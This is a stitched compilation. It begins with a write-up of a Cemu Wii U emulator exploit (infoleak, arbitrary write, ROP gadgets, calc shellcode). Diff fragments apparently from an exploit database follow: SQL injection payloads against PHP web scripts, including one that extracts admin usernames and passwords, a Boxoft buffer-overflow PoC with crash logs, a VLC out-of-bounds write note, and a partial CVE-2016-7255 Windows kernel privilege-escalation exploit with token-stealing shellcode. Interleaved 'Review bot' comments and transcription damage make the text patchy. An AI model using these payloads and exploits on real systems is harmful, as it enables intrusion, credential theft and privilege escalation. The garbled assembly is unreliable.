Cemu is a closed-source Wii U emulator developed by Exzap. New versions are released to those who donate to him via his Patreon first, then to the public one week later. According to its official website, Cemu "is not intended for general use yet", however it can run some games well.
It HLEs the Wii U OS APIs. For those who don't know, the Wii U runs executables in a modified ELF format that include additional PE-like import and export sections. Basically, the HLE here means each exported function from each shared library has been reimplemented, and runs in native code. That's a pretty large attack surface! So, when looking for bugs, I decided to start there.
## Finding bugs in Cemu HLE API emulation
Obviously, the first thing to do is to find where the API exports are set up so all of them can be annotated in IDA. I found a function at `0x1400AEDC0` (before relocation, cemu.exe is compiled with ASLR) that I labeled `set_up_emulated_API`. It takes three arguments: a pointer to a hashed (or obfuscated) shared library name, a pointer to a hashed (or obfuscated) exported function name, and a pointer to the function used for implementation. This function has a nice debug `printf` where it printed out the library name and exported function name, so I did things the long way and set a breakpoint there in x64dbg and labeled all the ~620(!) functions by hand. This took the better part of a day (however I did take breaks.)
Once I had all the functions labeled, I could go ahead and start looking for bugs. It was nice from my perspective that the emulated API functions did all the grunt work of endianness conversion of arguments and return values, so I didn't have to do anything of the sort myself. I first decided to check the more interestingly (for me) named functions, not long later I'd found a bug.
### sysapp!_SYSGetSystemApplicationTitleId
```c
uint64_t _SYSGetSystemApplicationTitleId(uint32_t index);
```
The implementation of this function just sets up a large array of title IDs (a title ID is a 64 bit integer that identifies "something that runs on the console", like a system application, firmware component or game, this has been used by Nintendo since the Wii and DSi, on console and handheld respectively) on the stack, then indexes it using the provided argument **without checking** and returns the array[index] to the emulator. What a perfect infoleak, to defeat ASLR later!
Exploiting this seems easy, just get the return address from the stack (index `37`), but it seems this isn't totally reliable, so instead I make a dummy call, then use index `52`, which seems to return an address inside the `cemu.exe` `.text` more reliably.
### padscore!KPADSetConnectCallback
```c
uint32_t KPADSetConnectCallback(uint32_t index,uint32_t value)
```
With an infoleak obtained, I just needed to find some (semi-)arbitrary write, and this took annoyingly longer to find. I found a few bugs that seemed promising but ultimately turned out to be unexploitable. Finally, after checking some of the functions not related to the OS, I found this function. Basically, it writes to an array of 32-bit integers (obviously the intended use of that array is function pointers inside the emulated system), in the `.data` section, with no checking of the provided index. Even better, it returns the old value (although I never needed to use this functionality when exploiting).
The array is unfortunately near the end of `.data`, but that doesn't really matter, as it's stored *before* a nice array of KPAD C++ objects with vtables that I can clobber -- and if a pointer inside one of the objects happens to not be NULL, this same function makes a vtable call twice! Even better!
## Exploitation
My PoC clobbers the first KPAD object (player 1 gamepad): it nulls out the checked pointer so no vtable calls are made while things are being overwritten, it overwrites the vtable pointers, sets up the ROP chain, sets up the stack pivot, makes that pointer non-NULL, and makes a dummy call to `KPADSetConnectCallback` to get ROP.
Heh, I just made that sound easy. It wasn't.
Let's see, it was annoying to find a stack pivot in the first place? But then I found the perfect pair of gadgets:
```
0x000000014015d404 : add rcx, 0x10 ; jmp qword ptr [rax]
0x0000000140228371 : push rcx ; pop rsp ; ret
```
When the first one gets called, `rcx` has the address of the vtable array, and `rax` has the address of the first element of the vtable array (which isn't actually used, so it's a perfect place to put a gadget address).
The ROP chain is written using `KPADSetConnectCallback` just like everything else, all this is written into a part of memory that contains UTF-16LE strings for controller mappings, that can only be seen if you open the controller settings. The ROP chain itself just grabs the address of the shellcode inside emulated RAM, `memcpy`s it to RWX memory allocated for the dynamic recompiler, and jumps there. Sure, it doesn't work if you deliberately disable the dynamic recompiler, but firstly, who even does that?!, and secondly, I'll leave the making of a ROP chain that uses `VirtualAlloc` to someone else if they wish.
The shellcode itself is just metasploit `windows/x64/exec` running `calc.exe`. Nothing special.
One final thing: when testing, I noticed that the emulator crashed if controller one was set up properly. It's because I initially thought the pointer that got checked for being NULL was a boolean or something else, and I'd only zeroed out the lower 32 bits of it. Whoops.
## Compiling the PoC
Linked at the top of the page is an archive including the PoC itself as `calc.rpx` plus source plus modified and additional import library dependencies (as source and binaries). I used [wut](https://github.com/decaf-emu/wut) to make the PoC which obviously depends on [devkitPro/devkitPPC](http://devkitpro.org/). After compiling wut successfully I had to make library additions, as both of the vulnerable functions were not included in the library set. Luckily enough it was very easy to make additions to the import libraries.
## Timeline
2016-12-30: started reversing
2016-12-31: found exploits
2017-01-01: made PoC, made initial contact with developer
2017-01-02: developer replies, said fixes have been made
2017-01-02: asked for release date
2017-01-02: reply: release date unknown, "in 1-2 weeks maybe"
2017-01-09: release to patrons, public disclosure
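Review bot: The gadget addresses (`0x14015d404` and `0x140228371`) and the `_SYSGetSystemApplicationTitleId` leak indexes 37/52 are offsets into one specific cemu.exe build, yet the writeup never states which build the PoC was verified against or how the leaked `.text` pointer is turned into the relocated image base, so the PoC will silently misfire on any other release. A line under Overview such as `PoC verified against cemu.exe <exact version/hash>; gadget offsets are pre-relocation and are rebased from the index-52 .text leak` (with the real version and rebasing arithmetic filled in) would make it reproducible. The Timeline also deserves a sentence: by the release model described in the Overview, the fixed build reached patrons on 2017-01-09 — the same day this PoC was published — while non-patrons were, per that model, still a week from a fix, and that exposure window should be stated rather than left for the reader to infer.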


@ -4,5 +4,4 @@ Eggblog is prone to multiple input validation vulnerabilities. These issues are
Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
http://www.example.com/eggblog/home/blog.php?id= http://www.example.com/eggblog/home/blog.php?id=70'% 20union%20select% 201,2,3,4,5, 6,7/*
70'% 20union%20select% 201,2,3,4,5, 6,7/*
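Review bot: The merged PoC URL still carries the stray spaces inside the percent-encoding — `% 20union`, `select% 201,2,3,4,5, 6,7` — so `%20` is broken into `% 20`, which is not a valid escape, and the request is malformed instead of decoding to the intended `70' union select 1,2,3,4,5,6,7/*`. Joining the two lines was the right move, but the line should read `http://www.example.com/eggblog/home/blog.php?id=70'%20union%20select%201,2,3,4,5,6,7/*`.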


@ -3,7 +3,6 @@
# Google Dork: My Php Dating # Google Dork: My Php Dating
# Date:09.01.2017 # Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm # Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: http://www.phponlinedatingsoftware.com/demo/
# Script Name: My Php Dating # Script Name: My Php Dating
# Script Version: 2.0 # Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm # Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm


@ -3,7 +3,6 @@
# Google Dork: FMyLife Clone Script # Google Dork: FMyLife Clone Script
# Date:10.01.2017 # Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm # Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition) # Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1 # Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/ # Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/

39
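--- a/platforms/php/webapps/41009.txt
+++ b/platforms/php/webapps/41009.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
+# Date: 11-01-2017
+# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
+# Exploit Author: Ben Lee
+# Contact: benlee9@outlook.com
+# Category: webapps
+# Tested on: Win7
+1. Description
+The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
+2. Vulnerable parameters:
+'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'
+3.Proof of Concept:
+Url:http://www.example.com/StartingPage/link_req_2.php
+Post data:
+[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]
+[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]
+Best Regards!
+Ben Lee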
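Review bot: The tail of the new file is mail-client residue rather than advisory content: the `[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]` attachment reference after the POST data, the `Best Regards! Ben Lee` sign-off, and the duplicated angle-bracketed URL in the `# Software Link:` header line. The attachment that `cid:` pointed to is not in the repository, so the reference is dead and should be removed along with the sign-off. The header block also carries no vendor-contact or fix-status line; a `# Vendor Notified: [DATE — placeholder]` / `# Fixed in: [VERSION — placeholder, unknown if none]` pair would let readers triaging the 1.3 release know whether a patched version exists.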

14
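--- a/platforms/php/webapps/41010.txt
+++ b/platforms/php/webapps/41010.txt
@@ -0,0 +1,14 @@
+# Vulnerability: My link trader - SQL Injection
+# Date: 11.01.2017
+# Vendor Homepage:
+http://software.friendsinwar.com/scripts_example/my_link_trader/
+# Tested on: Kali Linux 2016.2
+# Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#########################
+#########################
+# SQL Injection/POC :
+# Vulnerable Parametre : id
+# http://localhost/[PATH]/out.php?id=[SQL]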

21
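--- a/platforms/php/webapps/41023.txt
+++ b/platforms/php/webapps/41023.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Vulnerability: Travel Portal Script v9.33 - SQL Injection Web Vulnerability
+# Google Dork: Travel Portal Script
+# Date:11.01.2017
+# Vendor Homepage: http://itechscripts.com/travel-portal-script/
+# Script Name: Travel Portal Script
+# Script Version: v9.33
+# Script Buy Now: http://itechscripts.com/travel-portal-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+#
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/pages.php?id=[SQL]
+# http://localhost/[PATH]/hotel.php?hid=[SQL]
+# http://localhost/[PATH]/holiday.php?hid=[SQL]
+# E.t.c.... Other files, too. There are security vulnerabilities.
+# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
+#
+# # # # #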

19
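--- a/platforms/php/webapps/41024.txt
+++ b/platforms/php/webapps/41024.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Vulnerability: Movie Portal Script v7.35 - SQL Injection Web Vulnerability
+# Google Dork: Movie Portal Script
+# Date:11.01.2017
+# Vendor Homepage: http://itechscripts.com/movie-portal-script/
+# Script Name: Movie Portal Script
+# Script Version: v7.35
+# Script Buy Now: http://itechscripts.com/movie-portal-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+#
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/artist.php?a=[SQL]
+# http://localhost/[PATH]/movie.php?f=[SQL]
+# E.t.c.... Other files, too. There are security vulnerabilities.
+# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
+# # # # #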

18
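--- a/platforms/php/webapps/41027.txt
+++ b/platforms/php/webapps/41027.txt
@@ -0,0 +1,18 @@
+# Vulnerability: Dating Script v3.25 - SQL Injection
+# Date: 11.01.2017
+# Software link: http://itechscripts.com/dating-script/
+# Demo: http://dating.itechscripts.com
+# Price: 199$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#######################################
+1. Description
+An attacker can exploit this vulnerability to read from the database.
+2. SQL Injection / Proof of Concept:
+Vulnerable Parametre: id
+http://localhost/[PATH]/see_more_details.php?id=[SQL]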

204
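--- a/platforms/windows/dos/41018.txt
+++ b/platforms/windows/dos/41018.txt
@@ -0,0 +1,204 @@
+Document Title:
+===============
+Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2027
+Release Date:
+=============
+2017-01-09
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2027
+Common Vulnerability Scoring System:
+====================================
+5.8
+Product & Service Introduction:
+===============================
+Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high
+quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and
+convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be
+converted to mp3 format automatically when the source wav files are written to a specified monitored directory.
+(Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
+Vulnerability Disclosure Timeline:
+==================================
+2017-01-09: Public Disclosure (Vulnerability Laboratory)
+Discovery Status:
+=================
+Published
+Affected Product(s):
+====================
+Boxoft
+Product: Wav to MP3 - Player (Software) 1.1.0.0
+Exploitation Technique:
+=======================
+Local
+Severity Level:
+===============
+High
+Technical Details & Description:
+================================
+A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software.
+The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process.
+The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are
+able to load special crafted files that overwrites the eip register to compromise the local system process of the software.
+An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute
+arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode
+payload as txt file to add for the play module.
+The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8.
+Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.
+Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
+Proof of Concept (PoC):
+=======================
+The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+Manual steps to reproduce the vulnerability ...
+1. Download and install the "setup(free-wav-to-mp3)" file
+2. Run the poc code via active perl or perl
+3. A file format "poc.txt" will be created
+4. Click "ADD" and upload the (poc.txt)
+Name > POC.txt
+Size > 18KB
+Full file name : C:UsersDellDesktopPoc.txt
+5. Click "Play"
+Note: Software will crash with an unhandled exception and critical access violation
+6. Successful reproduce of the local buffer overflow vulnerability!
+PoC: Exploitation (Perl)
+#!/usr/bin/perl
+my $Buff = "x41" x 9000;
+open(MYFILE,'>>poc.txt');
+print MYFILE $Buff;
+close(MYFILE);
+print "SaifAllah benMassaoud";
+--- Debug Logs [WinDBG] ---
+(1d10.1d3c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
+eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
+31347831 ?? ???
+0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
+0012faf4: 31347831
+Invalid exception stack at 34783134
+0:000> d 0012faf4
+0012faf4 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
+0012fb04 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
+0012fb14 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
+0012fb24 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
+0012fb34 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
+0012fb44 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
+0012fb54 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
+0012fb64 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
+0:000>kb
+Following frames may be wrong.
+0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
+0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
+0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
+0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
+0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
+0012f7f4 00000000 00000000 78313478 00000002 0x12f810
+--- [CRASH - wavtomp3.exe] ---
+Problem Event Name: APPCRASH
+Application Name: wavtomp3.exe
+Application Version: 1.1.0.0
+Application Timestamp: 2a425e19
+Fault Module Name: StackHash_e98d
+Fault Module Version: 0.0.0.0
+Fault Module Timestamp: 00000000
+Exception Code: c0000005
+Exception Offset: 31347831
+OS Version: 6.1.7600.2.0.0.256.1
+Locale ID: 1033
+Additional Information 1: e98d
+Additional Information 2: e98dfca8bcf81bc1740adb135579ad53
+Additional Information 3: 6eab
+Additional Information 4: 6eabdd9e0dc94904be3b39a1c0583635
+Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.
+Security Risk:
+==============
+The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com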
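Review bot: The risk statements in this advisory contradict its own reproduction steps: `Severity Level: High` and `without user interaction` (Technical Details and PoC sections) sit next to a CVSS of 5.8, and steps 4–5 require the local user to add `poc.txt` through the application's ADD dialog and press Play. For a reader triaging this, the file should describe what the evidence supports — a local, user-assisted crash of the converter process — e.g. `Exploitation Technique: Local (user must open a crafted file)` with a severity wording consistent with the 5.8 score; the claim of arbitrary code execution is asserted but nothing in the listing demonstrates it. The register dump (`ecx=31347831`, `eip=31347831`, dump bytes `34 31 78 34`) shows plain ASCII text reaching the registers, which does not support the "unicode buffer overflow" characterization in Technical Details. The path `C:UsersDellDesktopPoc.txt` has also lost its separators, so the listing appears to have been stripped of backslashes in transcription and should be checked against the original at the cited reference URL.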

25
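--- a/platforms/windows/dos/41025.txt
+++ b/platforms/windows/dos/41025.txt
@@ -0,0 +1,25 @@
+In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
+write with user-controlled input.
+The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
+is filled with bytes from the input stream. However, it does not check
+that the number of channels in the input stream is less than or equal
+to the size of the buffer, resulting in an out-of-bounds write. The
+number of channels is clamped at <= 5.
+adpcm_ima_wav_channel_t channel[2];
+...
+for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
+{
+channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|(
+p_buffer[1] >> 7 ) ))<<7);
+channel[i_ch].i_step_index = p_buffer[1]&0x7f;
+...
+The mangling of the input p_buffer above and in
+AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
+is a potential for remote code execution via a malicious media file.
+POC:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov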
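Review bot: The new file never states which VLC release is affected or whether upstream has shipped a fix; the only version-bearing detail is `adpcm.c:595`, a source line number that shifts between releases and cannot be used for triage. An `Affected: VLC [VERSION — placeholder]` line and a `Fixed in: [VERSION — placeholder]` (or `Unpatched as of [DATE — placeholder]`) line near the top would let defenders decide whether to update or block `.mov` playback. It would also help to spell out the bound the excerpt implies: with `adpcm_ima_wav_channel_t channel[2]` and the channel count clamped to at most 5, any stream declaring 3–5 channels indexes past the array, so the missing check is presumably that `i_channels` not exceed the array size (or that the array be sized to the clamp); the "difficult to exploit" remark is an opinion and should be labelled as such rather than read as a risk rating.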

820
platforms/windows/local/41015.c Executable file

@ -0,0 +1,820 @@
/*
Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html
Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe
*/
// ricklarabee.blogspot.com
//This program is free software; you can redistribute it and/or
//modify it under the terms of the GNU General Public License
//as published by the Free Software Foundation.
//This program is distributed in the hope that it will be useful,
//but WITHOUT ANY WARRANTY; without even the implied warranty of
//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
//GNU General Public License for more details.
//You should have received a copy of the GNU General Public License
//along with this program; if not, write to the Free Software
//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255
// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib, "advapi32")
UINT64 PML4_BASE;
UINT PML4_SELF_REF_INDEX;
UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define GET_INDEX(va) ( ((va >> 39) & 0x1ff ))
////////////////////////////////////////////////////////
// Define Data Types
////////////////////////////////////////////////////////
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,
OUT PULONG Interval);
NtQuerySystemInformation_t NtQuerySystemInformation;
NtQueryIntervalProfile_t NtQueryIntervalProfile;
char shellcode[] = {
//0xcc,
0xfa, // CLI
0x9c, // PUSHFQ
0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer
0x50, // PUSH RAX
0x51, // PUSH RCX
0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]
0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX
0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID
0x53, // PUSH RBX
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS
0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset]
//<tag>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4
0x75, 0xf3, // JNE <tag>
0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM
0x53, // PUSH RBX
//<tag2>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x39, 0xcb, // CMP EBX, ECX // our PID
0x75, 0xf5, // JNE <tag2>
0x5b, // POP RBX
0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX
0x5b, // POP RBX
0x59, // POP RCX
0x58, // POP RAX
0x9d, // POPFQ
0xfb, // STI
0xff, 0xe0 // JMP RAX
};
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList = NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));
va_start(VaList, Format);
_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree(GetProcessHeap(), 0, pszDbgBuff);
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
for (i = 0; i < nCount; i++)
{
_sim_key_down(VK_TAB);
_sim_key_up(VK_TAB);
Sleep(1000);
}
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return nFinalRet;
}
int _sim_alt_esc(int count)
{
int i = 0;
for (i = 0; i<count; i++)
{
_sim_key_down(VK_MENU);
//_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
//_sim_key_up(VK_SHIFT);
}
return 0;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = { 0 };
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = { 0 };
UINT64 value = 0;
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if (0 == RegisterClassExW(&stWC))
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW | WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
